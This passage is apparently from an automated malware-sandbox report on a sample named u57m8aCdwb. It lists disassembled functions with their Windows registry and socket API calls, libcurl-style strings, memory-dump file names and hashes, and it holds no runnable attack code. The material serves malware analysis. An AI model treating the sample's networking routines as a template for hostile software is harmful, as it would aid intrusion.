RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 005C9974
RegCloseKey.KERNELBASE(?), ref: 005C998B

Strings

System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 005C993C
CARES_HOSTS, xrefs: 005C9788
#, xrefs: 005C9A3F
#, xrefs: 005C9B9D
\hos, xrefs: 005C999A
DatabasePath, xrefs: 005C996B

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
API String ID: 3677997916-615551945
Opcode ID: 27c553456a98a33d6b1878766a7daff8a20bf2c55955a8084a4f8dd5b9065e2c
Instruction ID: 442f4e28215ce414e45f5258b6c16c2bf81e8fe8bbd7fb879cb6c7dab5071148
Opcode Fuzzy Hash: 27c553456a98a33d6b1878766a7daff8a20bf2c55955a8084a4f8dd5b9065e2c
Instruction Fuzzy Hash: BE3267B5904202AFEB11AB64AC4AF9B7E94BF95314F08483CF90A96253F731ED14D793

Function 00538B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,00000001), ref: 00538C30
SleepEx.KERNELBASE(00000000,00000000), ref: 00538CF3

Strings

cf-socket.c, xrefs: 00538EDF
local address %s port %d..., xrefs: 00538C7F
connect to %s port %u from %s port %d failed: %s, xrefs: 00538E78
connected, xrefs: 00538DA7
not connected yet, xrefs: 00538BDC

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: Sleepconnect
String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
API String ID: 238548546-879669977
Opcode ID: 1cd9d5a88216794b70f6e7e92af5e69a4eb0f7f58cc9888ace96ff6cceb9735a
Instruction ID: 6d54c24ab372709fbfa1bc6eb759728e9efde43e3c90c82e02aac006264bb3b6
Opcode Fuzzy Hash: 1cd9d5a88216794b70f6e7e92af5e69a4eb0f7f58cc9888ace96ff6cceb9735a
Instruction Fuzzy Hash: AEB19D70604306AFEB18CF24C995BB6BBE4BF95314F148928F8594B2D2DB71EC58C762

Function 00502F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 00502FED
RegEnumKeyExA.KERNELBASE ref: 005031A5
RegCloseKey.KERNELBASE ref: 005031C0

Strings

d, xrefs: 00502FA0

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: CloseEnumOpen
String ID: d
API String ID: 1332880857-2564639436
Opcode ID: d9dbecbef06677ad0d4f97a1e5e1bef3fa6b10f4f5e0d993753f907c73ba4096
Instruction ID: aa777348be3e3df3f609227cd7b459d3f631258abb87e8a800c9be50c389ffad
Opcode Fuzzy Hash: d9dbecbef06677ad0d4f97a1e5e1bef3fa6b10f4f5e0d993753f907c73ba4096
Instruction Fuzzy Hash: 4171A4B4904319DFDB10EF69C58479EBBF0BF84308F11886DE89897351E7749A888F92

Function 005076A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32(multi.c,?,?,?,N=P,00000000,?,?,005107BF), ref: 005076EB

Strings

N=P, xrefs: 005076A3
SEND %s:%d send(%lu) = %ld, xrefs: 005076F8
multi.c, xrefs: 005076DD, 005076E9
LIMIT %s:%d %s reached memlimit, xrefs: 00507712, 00507731
send, xrefs: 0050770B, 0050772A

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: send
String ID: LIMIT %s:%d %s reached memlimit$N=P$SEND %s:%d send(%lu) = %ld$multi.c$send
API String ID: 2809346765-4069291208
Opcode ID: 97eee7a65660098ddf7cce0f56d383da359f95a0681bd5c8948e161a5f1893df
Instruction ID: 6eced960fdb0580353bb1a3da66668aa183a4a2d7d0d95d8657d0db66885f3e4
Opcode Fuzzy Hash: 97eee7a65660098ddf7cce0f56d383da359f95a0681bd5c8948e161a5f1893df
Instruction Fuzzy Hash: FF11EBB5E183497BD520DB159C8AF2F3F9CFBE6B68F4A0E18FC0413291D661AD1182B1

Function 00539290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0053935D
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00539388

Strings

cf-socket.c, xrefs: 005392CF
send(len=%zu) -> %d, err=%d, xrefs: 00539447
Send failure: %s, xrefs: 005393FB

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: Ioctlsetsockopt
String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
API String ID: 1903391676-2691795271
Opcode ID: 2fdee8b265f0531d7d841feec6e31af38cd934cf6d039f18dd79fc085fcfec17
Instruction ID: 5afe8ed4d3c8f8bbce7634f3e52bf6df196acb293f03adf0de08581eff0513d9
Opcode Fuzzy Hash: 2fdee8b265f0531d7d841feec6e31af38cd934cf6d039f18dd79fc085fcfec17
Instruction Fuzzy Hash: FB51E7B0600306AFDB11DF24C885FAABBA5FF84314F148929FD489B292E7B1E951CB51

Function 00507770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

recv.WS2_32(?,?,?,?), ref: 005077BB

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 005077E2, 00507801
recv, xrefs: 005077DB, 005077FA
RECV %s:%d recv(%lu) = %ld, xrefs: 005077C8

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: recv
String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
API String ID: 1507349165-640788491
Opcode ID: 27b0274168978c416c58f7069ea5dd2ac91eb5bc5bbe0b0435928abf9ad254ff
Instruction ID: 143849641902bb2cc0a8d527456d86ee24952ed69f358a4a8f604a8d3eb08eeb
Opcode Fuzzy Hash: 27b0274168978c416c58f7069ea5dd2ac91eb5bc5bbe0b0435928abf9ad254ff
Instruction Fuzzy Hash: 1E112BB4D193497BE120DB159C4AF2F7F9CFBDAB58F4A0A18FC0453382D660AC0182B1

Function 005075E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32(?,?,?), ref: 00507619

Strings

socket, xrefs: 00507643, 00507662
LIMIT %s:%d %s reached memlimit, xrefs: 0050764A, 00507669
FD %s:%d socket() = %d, xrefs: 0050762E

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: socket
String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
API String ID: 98920635-842387772
Opcode ID: 2f4f207f98e7468f3579a057ea2cf5d06c9d25bc1eb605a462e9232d55c4be4d
Instruction ID: eb8692a8ee8519fe7c68a476bed3683c15da4c4ab9b034ab81ba2ee3d3cf607a
Opcode Fuzzy Hash: 2f4f207f98e7468f3579a057ea2cf5d06c9d25bc1eb605a462e9232d55c4be4d
Instruction Fuzzy Hash: D3116F71E5025277D6219B296C5AF4F3F88FFD6734F490A14F810972D2D32298A5C3D1

Function 00888E90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 00888EAD

Strings

terminated, xrefs: 00888F20
@, xrefs: 00995911

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: _open
String ID: terminated$@
API String ID: 4183159743-3016906910
Opcode ID: 0668b6e2773fa26c6db2577d4d72c5b218a3bbc58ee935f894dfc89b6100f317
Instruction ID: 09d6a8057db45f02792291ad463d67b5ed6e99fe95b907f9192766546cd450a1
Opcode Fuzzy Hash: 0668b6e2773fa26c6db2577d4d72c5b218a3bbc58ee935f894dfc89b6100f317
Instruction Fuzzy Hash: 4C4124B0918305DFDB10EF79C84466EBAE5FF48314F858A29E898D7240EB38D905CB56

Function 0053A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getsockname.WS2_32(?,?,00000080), ref: 0053A1C6

Strings

getsockname() failed with errno %d: %s, xrefs: 0053A1F0
ssloc inet_ntop() failed with errno %d: %s, xrefs: 0053A23B

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: getsockname
String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
API String ID: 3358416759-2605427207
Opcode ID: 7f2d94cb20a7ea533234cb96d70f903e14c8b4f0117cff394bf5d735af0c389c
Instruction ID: f0d6ea14a33b387bf83f1ff0f4ab95ee7ae842f44073ccbf39974ead12209e51
Opcode Fuzzy Hash: 7f2d94cb20a7ea533234cb96d70f903e14c8b4f0117cff394bf5d735af0c389c
Instruction Fuzzy Hash: 2921D831848680BAF7269B29DC46FE777BCFF91328F040614F99853151FA32698586E2

Function 0051D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202), ref: 0051D65A

Strings

iphlpapi.dll, xrefs: 0051D5F0
if_nametoindex, xrefs: 0051D606

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: Startup
String ID: if_nametoindex$iphlpapi.dll
API String ID: 724789610-3097795196
Opcode ID: 51a9c689374198305387bca20dcce3de7f615b77dc63178749bea32001c59874
Instruction ID: fb9970085e479704f28c0727be816f0896c33cb9a80c3bc256082c1d4807e7d4
Opcode Fuzzy Hash: 51a9c689374198305387bca20dcce3de7f615b77dc63178749bea32001c59874
Instruction Fuzzy Hash: B4014ED0D4038116F7317B389D1B7AA39A07F61384F491879DC49951E7F669C5C9C363

Function 005CAA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(FFFFFFFF,?,00000000), ref: 005CAB9B
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 005CABE4

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: ioctlsocketsocket
String ID:
API String ID: 416004797-0
Opcode ID: 5625a7f08d6456ad3920748ced4c73c4ef5f5acc2cc166cea807d1a3195be90b
Instruction ID: 34bb1e0b83613ea21e2d0dfa0dd6f74cfbf0c2ef42b5ebdc4e6377aba0acf657
